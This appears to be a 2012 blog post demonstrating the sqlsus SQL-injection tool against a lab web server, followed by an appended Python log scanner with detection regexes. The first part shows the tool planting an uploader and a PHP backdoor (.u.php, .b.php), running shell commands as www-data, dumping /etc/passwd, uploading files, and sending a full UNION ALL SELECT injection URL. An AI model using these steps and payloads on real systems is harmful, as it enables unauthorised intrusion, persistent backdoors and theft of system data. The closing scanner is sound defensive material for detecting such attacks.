sqlsus 2
Posted on 2012-10-13 13:54:24
Getting a shell

    sqlsus> backdoor
    [+] Variable "backdoor" not set, trying to upload the backdoor
    [+] Variable "uploader" not set, trying to upload the tiny uploader
    [+] Uploader successfully uploaded to http://192.168.71.130//.u.php
    [+] Backdoor successfully uploaded to http://192.168.71.130//.b.php

    [+] Logging backdoor session to /root/.sqlsus/backdoor.192.168.71.130.log
    [+] Type \help for help
    sqlsus backdoor (exec)>

EXEC operations

    sqlsus backdoor (exec)> pwd
    /var/www
    sqlsus backdoor (exec)> id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    sqlsus backdoor (exec)>


Reading files

    sqlsus> download /etc/passwd
    --- /etc/passwd ---
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
    gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
    speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
    kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
    hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    saned:x:112:121::/home/saned:/bin/false
    brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
    postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
    smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
    vboxadd:x:999:1::/var/run/vboxadd:/bin/false
    sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
    mysql:x:1001:110::/home/mysql:/bin/false

    [+] File successfully saved to /root/.sqlsus/192.168.71.130/files/etc/passwd
    sqlsus>


Uploading files

    sqlsus> upload /root/.sqlsus/192.168.71.130/files/etc/passwd /var/www/1.txt
    [+] Variable "uploader" not set, trying to upload the tiny uploader
    [+] Uploader successfully uploaded to http://192.168.71.130//.u.php
    [+] Local file "/root/.sqlsus/192.168.71.130/files/etc/passwd" uploaded as "/var/www/1.txt" on the remote server
    sqlsus>


Debug mode

    sqlsus> set debug
    debug = 0
    sqlsus> set debug 1
    debug = 1
    sqlsus> start
    [+] UNION columns already set to (0,1), skipping auto-detection... (use "autoconf select_columns" to do it anyway)
    [+] max_url_length already set to 8198 , skipping auto-detection... (use "autoconf max_sendable" to do it anyway)
    [+] Filling %target...
    [debug][3829] [GET] http://192.168.71.130/pen/news.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20BINARY%200,CONCAT(0x5,(SELECT%20CONCAT_WS(0x7,IFNULL(database(),0x6),IFNULL(version(),0x6),IFNULL(current_user,0x6))),0x5)%20
    [debug][3829] [result] pentest/5.1.61-0ubuntu0.10.10.1-log/root@localhost
    +----------+-----------------------------+
    | Variable | Value                       |
    +----------+-----------------------------+
    | database | pentest                     |
    | user     | 'root'@'localhost'          |
    | version  | 5.1.61-0ubuntu0.10.10.1-log |
    +----------+-----------------------------+
    3 rows in set

    sqlsus>




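Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a fine blade.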
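From the defender's side, the session above leaves two things in the web server's access log: the UNION ALL SELECT request visible in the debug output, and requests for the dot-prefixed PHP files (.u.php, .b.php) written to the web root. The scanner below is an added example, not part of the original post or of sqlsus; the log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed access-log lines (combined format) modelled on the session above.
SAMPLE_LOG = """\
192.168.71.1 - - [13/Oct/2012:13:40:01 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.71.1 - - [13/Oct/2012:13:41:10 +0800] "GET /pen/news.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20BINARY%200,CONCAT(0x5,(SELECT%20CONCAT_WS(0x7,IFNULL(database(),0x6))),0x5)%20 HTTP/1.1" 200 498 "-" "-"
192.168.71.1 - - [13/Oct/2012:13:52:30 +0800] "POST //.u.php HTTP/1.1" 200 12 "-" "-"
192.168.71.1 - - [13/Oct/2012:13:53:02 +0800] "GET //.b.php HTTP/1.1" 200 40 "-" "-"
192.168.71.1 - - [13/Oct/2012:13:55:00 +0800] "GET /.well-known/security.txt HTTP/1.1" 200 90 "-" "-"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
COMMENT_RE = re.compile(r"/\*.*?\*/")  # inline SQL comments used in place of spaces
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
HIDDEN_PHP_RE = re.compile(r"/\.[^/]*\.php$", re.I)  # e.g. /.u.php, /.b.php


def scan(log_text):
    """Return (line_no, client_ip, rule, path) for every suspicious request."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read the leading "//" as a host name.
        path, _, query = m["target"].partition("?")
        path = unquote(path)
        query = COMMENT_RE.sub(" ", unquote_plus(query))
        if UNION_RE.search(query):
            findings.append((line_no, m["ip"], "sqli-union", path))
        if HIDDEN_PHP_RE.search(path):
            findings.append((line_no, m["ip"], "hidden-php", path))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

The UNION rule is a triage signal and can match benign query text containing the same words; the hidden-PHP rule is best paired with a file-integrity check for new dot-prefixed files in the web root.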
